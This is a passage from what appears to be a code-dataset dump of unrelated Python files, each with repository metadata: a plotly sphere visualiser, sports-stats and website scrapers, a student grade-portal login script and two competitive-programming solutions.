phi : array
Array of latitudes from 0 to pi.
"""
#creates an array of latitudes (phi)
phi=np.linspace(0,np.pi,self.num_lat)
self.phi=phi
return phi
def make_lon(self):
"""
Creates an array of longitudes based on the number of longitudes
Returns
-------
theta : array
Array of longitudes from 0 to 2pi.
"""
#creates an array of longitudes (theta)
theta=np.linspace(0,2*np.pi,self.num_lon)
self.theta=theta
return theta
def make_temp(self,custom_data="None",mean_temp=1000):
"""
Creates the temperature field based on temperature type
Parameters
----------
custom_data : array, optional
Custom temperature data. The default is "None".
mean_temp : float, optional
Mean temperature for the zonal and uniform temperature fields.
The default is 1000.
Returns
-------
data : array
temperature field data
"""
if self.temp_type=="uniform":
#creates uniform temperature field
data=mean_temp*np.ones((self.num_lon,self.num_lat))
elif self.temp_type=="zonal":
#creates zonal temperature field
lat=self.make_lat()
data=np.sin(lat)*mean_temp*np.ones((self.num_lon,self.num_lat))
elif self.temp_type=="custom":
#uses an array
data=custom_data
self.temp=data
return data
def get_temp(self):
"""
Gets the temperature from the object of :class: 'Sphere'
Returns
-------
temp : array
temperature field assigned to the object.
"""
temp=self.temp
return temp
def make_hoverdata(x,y,z,input_temp):
"""
Makes the data that appear when hovering over a point on a sphere,
namely latitude, longitude, and the temperature value
Parameters
----------
x : array
array of x coordinates for the sphere.
y : array
array of y coordinates for the sphere.
z : array
array of z coordinates for the sphere.
input_temp : array
temperature field
Returns
-------
hoverdata : array
Stack of latitude, longitude, and temperature field arrays
"""
trunc_temp= input_temp.round(decimals=0)
lats=np.arcsin(z)*180/np.pi
lats=lats.round(decimals=1)
lons=2*np.arctan(np.divide(y,(x**2+y**2)))*180/np.pi
lons=lons.round(decimals=1)
hoverdata=np.stack((lats.T, lons.T, trunc_temp.T), axis =-1)
return hoverdata
def plot_sphere(planet,theta,phi,temp,cmin=700,cmax=1200,cscale='jet',save=False,name="None"):
"""
This function creates the interactive visualization plot
Parameters
----------
planet : object of class Sphere
the planet
theta : array
longitudes.
phi : array
latitudes.
temp : array
temperature field data
cmin : float, optional
Lower bound on the colorbar, K. The default is 700.
cmax : float, optional
Upper bound on the colorbar, K. The default is 1200.
cscale : string
colormap to use
save : bool, optional
If true, save output as html. The default is False.
name : string, optional
Name of (or path to) html file
Returns
-------
fig : figure
"""
x = np.outer(np.cos(theta),np.sin(phi))
y = np.outer(np.sin(theta),np.sin(phi))
z = np.outer(np.ones(planet.num_lon),np.cos(phi))
hoverdata=make_hoverdata(x,y,z,temp)
#call plotly
fig= go.Figure(go.Surface(x=x, y=y, z=z,surfacecolor=temp,cmax=cmax,cmin=cmin,colorscale=cscale,customdata=hoverdata, hovertemplate ="lat: %{customdata[0]}"+\
"<br>lon: %{customdata[1]}"+\
"<br>temp:%{customdata[2]} K<extra></extra>", \
contours = {
"x": {"show": True, "start": -1, "end": 1, "size": 1, "color":"black"},
"y": {"show": True, "start": -1, "end": 1, "size": 1, "color":"black"},
"z": {"show": True, "start": -1, "end": 1, "size": 1, "color":"black"}
}))
fig.update_layout(scene = dict(
xaxis = dict(
showbackground=False,visible=False),
yaxis = dict(
showbackground=False,visible=False),
zaxis = dict(
showbackground=False,visible=False)))
if save==1:
fig.write_html(name+".html")
return fig | 27.542601 | 165 | 0.549821 | 739 | 6,142 | 4.49797 | 0.255751 | 0.016245 | 0.015042 | 0.028881 | 0.244284 | 0.159146 | 0.159146 | 0.159146 | 0.140493 | 0.140493 | 0 | 0.016466 | 0.337512 | 6,142 | 223 | 166 | 27.542601 | 0.800442 | 0.412732 | 0 | 0.032787 | 0 | 0 | 0.095748 | 0.00837 | 0 | 0 | 0 | 0 | 0.016393 | 1 | 0.114754 | false | 0 | 0.032787 | 0 | 0.262295 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2dae4d4cda680cf412e66d833119134b26b6615 | 10,693 | py | Python | Player Stats Web Scraper.py | sezenack/Red-Army-App | d5a37dd5c59e27eccc805e566f5a4f908303855b | [
"MIT"
] | 3 | 2019-02-18T04:26:00.000Z | 2022-03-17T16:12:23.000Z | Player Stats Web Scraper.py | sezenack/Red-Army-App | d5a37dd5c59e27eccc805e566f5a4f908303855b | [
"MIT"
] | null | null | null | Player Stats Web Scraper.py | sezenack/Red-Army-App | d5a37dd5c59e27eccc805e566f5a4f908303855b | [
"MIT"
] | 4 | 2019-01-29T17:24:02.000Z | 2019-02-22T21:16:20.000Z | import requests
import urllib.request
import time
from bs4 import BeautifulSoup
# Team Stats Skaters
url1 = 'http://collegehockeyinc.com/stats/filters19.php?target=REN'
response1 = requests.get(url1)
soup1 = BeautifulSoup(response1.text, 'html.parser')
table1 = soup1.findAll('td')
infostrings1 = []
i = 0
header = ""
while i < 26:
header += table1[i].get_text() + "\n"
i += 1
infostrings1.append(header)
for t in range(26, 844, 30):
a = 0
string = ""
while a < 30 and a + t < len(table1):
string += table1[t + a].get_text() + "\n"
a += 1
infostrings1.append(string)
# Team Stats Goaltenders
url2 = 'http://collegehockeyinc.com/stats/filters19.php?target=REN&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&wins=on&losses=on&ties=on&otgames=all&start=35&end=224&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=none&limitn=1&limitt=indiv&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=goalie&sort=g'
response2 = requests.get(url2)
soup2 = BeautifulSoup(response2.text, 'html.parser')
table2 = soup2.findAll('td')
infostrings2 = []
i = 0
header = ""
while i < 17:
header += table2[i].get_text() + "\n"
i += 1
infostrings2.append(header)
for t in range(17, 20 * 3 + 17, 20):
a = 0
string = ""
while a < 20 and a + t < len(table2):
txt = table2[t + a].get_text()
if '%' in txt:
txt = txt[0:(txt.index('%') + 1)]
string += txt + "\n"
a += 1
infostrings2.append(string)
# ECAC Player Stats (Main Skater Stats and Main Goaltender Stats)
url3 = 'https://www.ecachockey.com/men/2018-19/leaders'
response3 = requests.get(url3)
soup3 = BeautifulSoup(response3.text, 'html.parser')
table3 = soup3.findAll('tr')
table3 = table3[2:8] + table3[9:15] + table3[16:22] + table3[23:29] + table3[31:37] + table3[38:44]
infostrings3 = []
for t in table3:
infostrings3.append(t.get_text())
# ECAC Skater Points per Game Stats
url4 = 'http://collegehockeyinc.com/stats/filters19.php?target=EC&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&start=35&end=224&wins=on&losses=on&ties=on&otgames=all&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=none&limitn=1&limitt=indiv&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=scoring&sort=p_gm'
response4 = requests.get(url4)
soup4 = BeautifulSoup(response4.text, 'html.parser')
table4 = soup4.findAll('td')
infostrings4 = []
for t in range(27, len(table4), 31):
a = 0
string = ""
while a < 5 and a + t < len(table4):
string += table4[t + a].get_text() + "\n"
a += 1
string += table4[t + 12].get_text() + "\n"
infostrings4.append(string)
# ECAC Skater Shooting % Stats
url5 = 'http://collegehockeyinc.com/stats/filters19.php?target=EC&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&start=35&end=224&wins=on&losses=on&ties=on&otgames=all&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=none&limitn=1&limitt=indiv&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=scoring&sort=shpct'
response5 = requests.get(url5)
soup5 = BeautifulSoup(response5.text, 'html.parser')
table5 = soup5.findAll('td')
infostrings5 = []
for t in range(27, len(table5), 31):
a = 0
string = ""
while a < 5 and a + t < len(table5):
string += table5[t + a].get_text() + "\n"
a += 1
string += table5[t + 24].get_text() + "\n"
infostrings5.append(string)
# ECAC Skater Faceoff % Stats
url6 = 'http://collegehockeyinc.com/stats/filters19.php?target=EC&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&start=35&end=224&wins=on&losses=on&ties=on&otgames=all&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=none&limitn=1&limitt=indiv&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=scoring&sort=fpct'
response6 = requests.get(url6)
soup6 = BeautifulSoup(response6.text, 'html.parser')
table6 = soup6.findAll('td')
infostrings6 = []
for t in range(27, 31 * 69 + 27, 31):
a = 0
string = ""
while a < 5 and a + t < len(table6):
string += table6[t + a].get_text() + "\n"
a += 1
string += table6[t + 27].get_text() + "\n"
infostrings6.append(string)
# ECAC Skater Blocked Shots Stats
url7 = 'http://collegehockeyinc.com/stats/filters19.php?target=EC&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&start=35&end=224&wins=on&losses=on&ties=on&otgames=all&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=none&limitn=1&limitt=indiv&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=scoring&sort=blk'
response7 = requests.get(url7)
soup7 = BeautifulSoup(response7.text, 'html.parser')
table7 = soup7.findAll('td')
infostrings7 = []
for t in range(28, 100 * 32 + 28, 32):
a = 0
string = ""
while a < 5 and a + t < len(table7):
string += table7[t + a].get_text() + "\n"
a += 1
string += table7[t + 28].get_text() + "\n"
infostrings7.append(string)
# National Skater Main Stats
url8 = 'http://collegehockeyinc.com/stats/filters19.php'
response8 = requests.get(url8)
soup8 = BeautifulSoup(response8.text, 'html.parser')
table8 = soup8.findAll('td')
infostrings8 = []
for t in range(27, len(table8), 31):
a = 0
string = ""
while a < 10 and a + t < len(table8):
if a == 5 or a == 6:
a += 1
continue
string += table8[t + a].get_text() + "\n"
a += 1
string += table8[t + 12].get_text() + "\n"
infostrings8.append(string)
# National Skater Plus/Minus Stats
url9 = 'http://collegehockeyinc.com/stats/filters19.php?target=ALL&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&start=1&end=224&wins=on&losses=on&ties=on&otgames=&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=&limitn=&limitt=&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=scoring&sort=pm'
response9 = requests.get(url9)
soup9 = BeautifulSoup(response9.text, 'html.parser')
table9 = soup9.findAll('td')
infostrings9 = []
for t in range(27, len(table9), 31):
a = 0
string = ""
while a < 5 and a + t < len(table9):
string += table9[t + a].get_text() + "\n"
a += 1
string += table9[t + 21].get_text() + "\n"
infostrings9.append(string)
# National Skater Shooting % Stats
url10 = 'http://collegehockeyinc.com/stats/filters19.php?target=ALL&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&start=1&end=224&wins=on&losses=on&ties=on&otgames=&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=&limitn=&limitt=&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=scoring&sort=shpct'
response10 = requests.get(url10)
soup10 = BeautifulSoup(response10.text, 'html.parser')
table10 = soup10.findAll('td')
infostrings10 = []
for t in range(27, len(table10), 31):
a = 0
string = ""
while a < 5 and a + t < len(table10):
string += table10[t + a].get_text() + "\n"
a += 1
string += table10[t + 24].get_text() + "\n"
infostrings10.append(string)
# National Skater Faceoff % Stats
url11 = 'http://collegehockeyinc.com/stats/filters19.php?target=ALL&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&start=1&end=224&wins=on&losses=on&ties=on&otgames=&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=&limitn=&limitt=&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=scoring&sort=fpct'
response11 = requests.get(url11)
soup11 = BeautifulSoup(response11.text, 'html.parser')
table11 = soup11.findAll('td')
infostrings11 = []
for t in range(27, len(table11), 31):
a = 0
string = ""
while a < 5 and a + t < len(table11):
string += table11[t + a].get_text() + "\n"
a += 1
string += table11[t + 27].get_text() + "\n"
infostrings11.append(string)
# National Skater Blocked Shots Stats
url12 = 'http://collegehockeyinc.com/stats/filters19.php?target=ALL&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&start=1&end=224&wins=on&losses=on&ties=on&otgames=&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=&limitn=&limitt=&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=scoring&sort=blk'
response12 = requests.get(url12)
soup12 = BeautifulSoup(response12.text, 'html.parser')
table12 = soup12.findAll('td')
infostrings12 = []
for t in range(28, len(table12), 32):
a = 0
string = ""
while a < 5 and a + t < len(table12):
string += table12[t + a].get_text() + "\n"
a += 1
string += table12[t + 28].get_text() + "\n"
infostrings12.append(string)
# National Main Goaltender Stats
url13 = 'http://collegehockeyinc.com/stats/filters19.php?stats=goalie'
response13 = requests.get(url13)
soup13 = BeautifulSoup(response13.text, 'html.parser')
table13 = soup13.findAll('td')
infostrings13 = []
for t in range(17, 70 * 20 + 17, 20):
a = 0
string = ""
while a < 4 and a + t < len(table13):
string += table13[t + a].get_text() + "\n"
a += 1
string += table13[t + 13].get_text() + "\n"
string += table13[t + 14].get_text() + "\n"
infostrings13.append(string) | 50.677725 | 503 | 0.660713 | 1,837 | 10,693 | 3.831247 | 0.126293 | 0.02586 | 0.02728 | 0.047741 | 0.605001 | 0.577011 | 0.540068 | 0.533248 | 0.489486 | 0.489486 | 0 | 0.062617 | 0.150192 | 10,693 | 211 | 504 | 50.677725 | 0.711896 | 0.039278 | 0 | 0.232432 | 0 | 0.048649 | 0.47791 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021622 | 0 | 0.021622 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2dcf951d5069ea7d7ae3174ad3cf8b3944c87c4 | 517 | py | Python | codeforces/O.py | pavponn/machine-learning | 95ab573556a72fb5d16761cb8136d2896ae55263 | [
"MIT"
] | null | null | null | codeforces/O.py | pavponn/machine-learning | 95ab573556a72fb5d16761cb8136d2896ae55263 | [
"MIT"
] | null | null | null | codeforces/O.py | pavponn/machine-learning | 95ab573556a72fb5d16761cb8136d2896ae55263 | [
"MIT"
] | null | null | null |
k = int(input())
n = int(input())
objects = []
for i in range(n):
x_i, y_i = [int(a) for a in input().split()]
objects.append((x_i, y_i))
left, right = 0, 0
for obj in objects:
left += (obj[1] ** 2) / n
p_x = [0 for _ in range(k + 1)]
e_y_by_x = [0 for _ in range(k + 1)]
for obj in objects:
p_x[obj[0]] += 1.0 / (n + 0.0)
e_y_by_x[obj[0]] += obj[1] / (n + 0.0)
for i in range(k + 1):
if p_x[i] == 0:
continue
right += e_y_by_x[i] * e_y_by_x[i] / p_x[i]
print(left - right)
| 19.148148 | 48 | 0.526112 | 113 | 517 | 2.212389 | 0.230089 | 0.048 | 0.064 | 0.08 | 0.16 | 0.112 | 0.112 | 0 | 0 | 0 | 0 | 0.050265 | 0.268859 | 517 | 26 | 49 | 19.884615 | 0.611111 | 0 | 0 | 0.105263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2de29b15c295568077b2e97a9df7c80475313af | 5,455 | py | Python | SpiderOfZFSystem/spider.py | mental2008/python_spider | fa1b039046a3ca4597064f0c3568e87a43ff551f | [
"MIT"
] | 1 | 2017-07-28T16:36:30.000Z | 2017-07-28T16:36:30.000Z | SpiderOfZFSystem/spider.py | mental2008/python_spider | fa1b039046a3ca4597064f0c3568e87a43ff551f | [
"MIT"
] | null | null | null | SpiderOfZFSystem/spider.py | mental2008/python_spider | fa1b039046a3ca4597064f0c3568e87a43ff551f | [
"MIT"
] | null | null | null | import requests
import os
from urllib import parse
from bs4 import BeautifulSoup
import bs4
def getResponse(url, hd):
try:
response = requests.get(url, timeout = 30, headers = hd)
response.raise_for_status()
response.encoding = response.apparent_encoding
return response
except:
return "Error"
def downloadCheckCode(url):
url = url + "CheckCode.aspx"
hd = {'user-agent': 'Mozilla/5.0'}
response = getResponse(url, hd)
if response == "Error":
print("验证码下载错误...")
return "Error"
else:
print("正在下载验证码...")
with open("CheckCode.png", 'wb') as f:
f.write(response.content)
print("验证码已下载")
os.startfile("CheckCode.png")
def getViewState(soup):
return soup.find('input', attrs = {'name': '__VIEWSTATE'})['value']
def login(url):
url = url + "default2.aspx"
hd = {'user-agent': 'Mozilla/5.0'}
response = getResponse(url, hd)
if response == "Error":
print("登陆失败...")
else:
html = response.text
soup = BeautifulSoup(html, "html.parser")
__viewstate = getViewState(soup)
data = {'__VIEWSTATE': '',
'txtUserName': '',
'TextBox2': '',
'txtSecretCode': '',
'RadioButtonList1': '\xd1\xa7\xc9\xfa',
'Button1': '',
'lbLanguage:': '',
'hidPdrs': '',
'hidsc': ''}
data['__VIEWSTATE'] = __viewstate
studentID = input("请输入学号: ")
data['TextBox2'] = input("请输入密码: ")
data['txtSecretCode'] = input("请输入图片中的验证码: ")
data['txtUserName'] = studentID
print("登陆中...")
s = requests.session()
s.post(url, data = data)
try:
r = s.get("http://xsweb.scuteo.com/(klbbxierheaus4ftnggitnuz)/xs_main.aspx?xh=" + studentID, timeout = 30, headers = hd)
newsoup = BeautifulSoup(r.text, 'html.parser')
name = newsoup.find('span', attrs = {'id': 'xhxm'}).text[:-2]
print("登陆成功!欢迎你,{0}同学".format(name))
except:
print("登陆失败...")
return "Error"
return s, studentID, name
def queryScore(s, studentID, name):
url = "http://xsweb.scuteo.com/(klbbxierheaus4ftnggitnuz)/xscjcx.aspx?xh=" + studentID + "&xm=" + parse.quote(name.encode('gb2312')) + "&gnmkdm=N121605"
hd = {'Referer': url, 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36',
'Upgrade-Insecure-Requests': '1', 'Host': 'xsweb.scuteo.com',
'Origin': 'http://xsweb.scuteo.com', 'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'keep-alive', 'Cache-Control': 'max-age=0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.8'}
response = s.get(url, headers = hd)
soup = BeautifulSoup(response.text, 'html.parser')
print("正在查询成绩...")
__viewstate = getViewState(soup)
data = {'__EVENTTARGET': '', '__EVENTARGUMENT': '',
'__VIEWSTATE': __viewstate, 'hidLanguage': '',
'ddlXN': '', 'ddlXQ': '','ddl_kcxz': '',
'btn_zcj': '\xc0\xfa\xc4\xea\xb3\xc9\xbc\xa8'}
r = s.post(url, headers = hd, data = data)
return r.text
def printFormat(text, width):
def is_chinese(char):
if char >= u'\u4e00' and char <= u'\u9fa5':
return True
else:
if char == 'Ⅰ' or char == '(' or char == ')' or char == 'Ⅲ' or char == 'Ⅱ':
return True
else :
return False
stext = str(text)
cn_count = 0
for u in stext:
if is_chinese(u):
cn_count = cn_count + 1
return stext + " " * (width - cn_count - len(stext))
def printScore(html):
soup = BeautifulSoup(html, 'html.parser')
table = soup.find('table', attrs = {'class': 'datelist'})
#tpt = '{0:{9}<10}{1:{9}<3}{2:{9}<20}{3:{9}<7}{4:{9}<5}{5:{9}<5}{6:{9}<5}{7:{9}<15}{8:{9}<3}'
mp = [2, 3, 5, 6, 8, 9, 10, 14, 17]
num = 1
for tr in table.contents:
count = 1
ulist = []
if isinstance(tr, bs4.element.Tag):
for td in tr.contents:
if count in mp:
ulist.append(td.string)
count = count + 1
#print(tpt.format(ulist[0], ulist[1], ulist[2], ulist[3], ulist[4], ulist[5], ulist[6], ulist[7], ulist[8], chr(12288)))
if not num == 1:
ulist[5] = ulist[5][3:]
print(printFormat(ulist[0], 10) + printFormat(ulist[1], 5) +
printFormat(ulist[2], 30) + printFormat(ulist[3], 10) +
printFormat(ulist[4], 10) + printFormat(ulist[5], 10) +
printFormat(ulist[6], 10) + printFormat(ulist[7], 25) +
printFormat(ulist[8], 5))
num = num + 1
if __name__ == "__main__":
url = "http://xsweb.scuteo.com/(klbbxierheaus4ftnggitnuz)/" #original url
if not downloadCheckCode(url) == "Error":
loginData = login(url)
if not loginData == "Error":
s = loginData[0]
studentID = loginData[1]
name = loginData[2]
html = queryScore(s, studentID, name)
printScore(html)
| 38.415493 | 159 | 0.538038 | 636 | 5,455 | 4.556604 | 0.353774 | 0.049689 | 0.024155 | 0.024845 | 0.120083 | 0.077985 | 0.046929 | 0.046929 | 0.046929 | 0.046929 | 0 | 0.045185 | 0.290009 | 5,455 | 141 | 160 | 38.687943 | 0.701523 | 0.04088 | 0 | 0.179688 | 0 | 0.015625 | 0.246855 | 0.034395 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.039063 | 0.007813 | 0.1875 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2e0d3349b34b040bec17e174ec417f5654fba07 | 1,563 | py | Python | disjoint sets union/2F.py | iammanish17/CodeforcesEdu | 961543b332c773010320bd0b2e9d4a4b1c8dc0ea | [
"MIT"
] | 6 | 2020-09-14T19:16:23.000Z | 2021-12-10T19:07:51.000Z | disjoint sets union/2F.py | iammanish17/CodeforcesEdu | 961543b332c773010320bd0b2e9d4a4b1c8dc0ea | [
"MIT"
] | null | null | null | disjoint sets union/2F.py | iammanish17/CodeforcesEdu | 961543b332c773010320bd0b2e9d4a4b1c8dc0ea | [
"MIT"
] | 1 | 2021-08-12T19:37:22.000Z | 2021-08-12T19:37:22.000Z | # By manish.17, contest: ITMO Academy. СНМ 2, problem: (F) Dense spanning tree
# https://codeforces.com/profile/manish.17
class DisjointSetUnion:
def __init__(self, n):
self.parent = [*range(n+1)]
self.size = [1]*(n+1)
def get(self, a):
"""Returns the identifier (parent) of the set to which a belongs to!"""
if self.parent[a] == a:
return a
x = a
while a != self.parent[a]:
a = self.parent[a]
while x != self.parent[x]:
self.parent[x], x = a, self.parent[x]
return a
def union(self, a, b):
"""Join two sets that contain a and b!"""
a, b = self.get(a), self.get(b)
if a != b:
if self.size[a] > self.size[b]:
a, b = b, a
self.parent[a] = b
self.size[b] += self.size[a]
import sys
input = sys.stdin.readline
n, m = map(int, input().split())
y = []
for _ in range(m):
b, e, w = map(int, input().split())
y += [[w, b, e]]
y = sorted(y, key=lambda x: x[0])
ans = 10**18
found = False
for i in range(len(y)):
dsu = DisjointSetUnion(n)
cnt = 0
m1 = 10**18
m2 = -10**18
for j in range(i, len(y)):
p, q, r = y[j]
if dsu.get(q) != dsu.get(r):
dsu.union(q, r)
cnt += 1
m1 = min(m1, p)
m2 = max(m2, p)
if cnt == n-1:break
if cnt == n-1:
found = True
ans = min(ans, m2-m1)
else:break
if not found:
print("NO")
else:
print("YES")
print(ans)
| 24.046154 | 79 | 0.486244 | 248 | 1,563 | 3.044355 | 0.366935 | 0.10596 | 0.058278 | 0.047682 | 0.045033 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032448 | 0.349328 | 1,563 | 64 | 80 | 24.421875 | 0.709931 | 0.140755 | 0 | 0.038462 | 0 | 0 | 0.003757 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057692 | false | 0 | 0.019231 | 0 | 0.134615 | 0.057692 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2e1d5ed6c66a448128eda6819d43657d1b0440a | 4,384 | py | Python | one_spider/spiders/one.py | guzdy/ONE_SPIDER | 6676be923342e79c76336fd56b96c3eafb335f90 | [
"MIT"
] | null | null | null | one_spider/spiders/one.py | guzdy/ONE_SPIDER | 6676be923342e79c76336fd56b96c3eafb335f90 | [
"MIT"
] | null | null | null | one_spider/spiders/one.py | guzdy/ONE_SPIDER | 6676be923342e79c76336fd56b96c3eafb335f90 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import scrapy
from one_spider.items import OneItemArticle, OneItemImage, OneItemQuestion
from scrapy.loader import ItemLoader
import html2text
class OneSpider(scrapy.Spider):
name = 'one'
start_urls = ['http://wufazhuce.com/']
def parse(self, response):
"""分析首页,获取最新数据"""
# image 部分
img_url_latest = response.xpath('//div[@class="fp-one"]//div[@class="item active"]'
'/a/@href').extract_first()
print(img_url_latest)
img_num_latest = int(img_url_latest.split('/')[-1])
print(img_num_latest)
for num in range(14, img_num_latest+1): # 14页开始
img_url = 'http://wufazhuce.com/one/'+str(num)
yield response.follow(img_url, callback=self.parse_img)
# article 部分
article_url_latest = response.xpath('//div[@class="fp-one-articulo"]//p[@class='
'"one-articulo-titulo"]/a/@href').extract_first()
print(article_url_latest)
article_num_latest = int(article_url_latest.split('/')[-1])
print(article_num_latest)
for num in range(55, article_num_latest+1): # 55
# 实际上顺序是很混乱的
article_url = 'http://wufazhuce.com/article/'+str(num)
yield response.follow(article_url, callback=self.parse_article)
# question 部分
question_url_latest = response.xpath('//div[@class="fp-one-cuestion"]//p[@class='
'"one-cuestion-titulo"]/a/@href').extract_first()
print(question_url_latest)
question_num_latest = int(question_url_latest.split('/')[-1])
print(question_num_latest)
for num in range(8, question_num_latest+1): # 8
question_url = 'http://wufazhuce.com/question/'+str(num)
yield response.follow(question_url, callback=self.parse_question)
def parse_img(self, response):
print('抓取{}成功,正在抓取数据'.format(response.url))
loader = ItemLoader(item=OneItemImage(), response=response)
loader.add_xpath('img_url', '//div[@class="one-imagen"]/img/@src')
img_num = response.xpath('//title/text()').re('\d+')
loader.add_value('img_num', img_num)
description = response.xpath('//div[@class="one-cita"]/text()').extract_first().strip()
loader.add_value('description', description)
img_info = response.xpath('string(//div[@class="one-imagen-leyenda"])').extract_first().strip()
loader.add_value('img_info', img_info)
date_raw = response.xpath('//div[@class="one-pubdate"]/p/text()').extract()
loader.add_value('date', date_raw[0]+' '+date_raw[1])
loader.add_value('url', response.url)
return loader.load_item()
def parse_article(self, response):
print('抓取{}成功,正在抓取数据'.format(response.url))
loader = ItemLoader(item=OneItemArticle(), response=response)
loader.add_xpath('description', '//meta[@name="description"]/@content')
title = response.xpath('string(//title)').extract_first().strip(' - 「ONE · 一个」').strip()
loader.add_value('title', title)
author = response.xpath('string(//p[@class="articulo-autor"])').extract_first()\
.strip().strip('作者/')
loader.add_value('author', author)
text_raw = response.xpath('//div[@class="articulo-contenido"]').extract_first()
loader.add_value('article', html2text.html2text(text_raw))
loader.add_value('url', response.url)
return loader.load_item()
def parse_question(self, response):
print('抓取{}成功,正在抓取数据'.format(response.url))
loader = ItemLoader(item=OneItemQuestion(), response=response)
quest = response.xpath('//h4/text()').extract_first().strip()
